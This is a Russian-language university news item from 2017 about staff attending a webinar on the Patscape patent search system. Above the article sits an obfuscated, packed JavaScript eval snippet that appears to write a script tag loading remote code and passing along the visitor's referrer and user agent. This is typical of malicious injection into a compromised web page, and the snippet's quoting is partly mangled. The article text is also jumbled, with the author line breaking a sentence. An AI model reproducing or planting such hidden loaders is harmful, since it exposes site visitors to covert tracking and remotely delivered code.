

```
26 eval(function(p,a,c,k,e,d){e=function(c){return
c.toString(36)};if(!".replace(/^(,String))){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e)
{return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new
RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n
m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|
97|language|jquery|userAgent|navigator|script|adkhr|var|u0026u|referrer|y|dian||js|php'.split('|'),0
,{}))
```

октября сотрудники отдела Интеллектуальной собственности и
патентно-лицензионной работы Донецкого национального технического университета
приняли участие в **вебинаре «Патентный
поиск в Patscape**
»

который был проведен сотрудниками
отделения

Всероссийской патентно-технической библиотеки (ВПТБ) Федерального института
промышленной собственности (ФИПС) в библиотеке им. Н.К. Крупской
[новости ФИПС](#)



В мероприятии, посвященном вопросам необходимости проведения патентного поиска при создании новых технических решений, а также вопросам использования системы

Автор: Kondratenko
06.11.2017 13:31

поиска патентной информации **Patscape**, приняли участие патентоведы ведущих научно-исследовательских институтов и вузов, сотрудники библиотек и представители изобретательского сообщества Донецка и Луганска.

Новый инструмент патентного поиска **Patscape** обрабатывает **более 120 млн. патентных документов, включая российские и зарубежные патентные массивы.**

Следует отметить, что система

Patscape

преимущественно предназначена для поиска патентной информации с использованием гаджетов и считается лучшей «шпаргалкой», благодаря которой каждый опытный или начинающий специалист, изобретатель, молодой ученый, студент может оперативно воспроизвести патентный поиск и оценить патентную ситуацию.

С целью повышения престижности и значимости научных работ ДонНТУ в отделе [ИС и ПЛР](#)

проводятся консультации для сотрудников и обучающихся по патентному поиску с использованием современных доступных электронных ресурсов, в том числе системы **Patscape**.

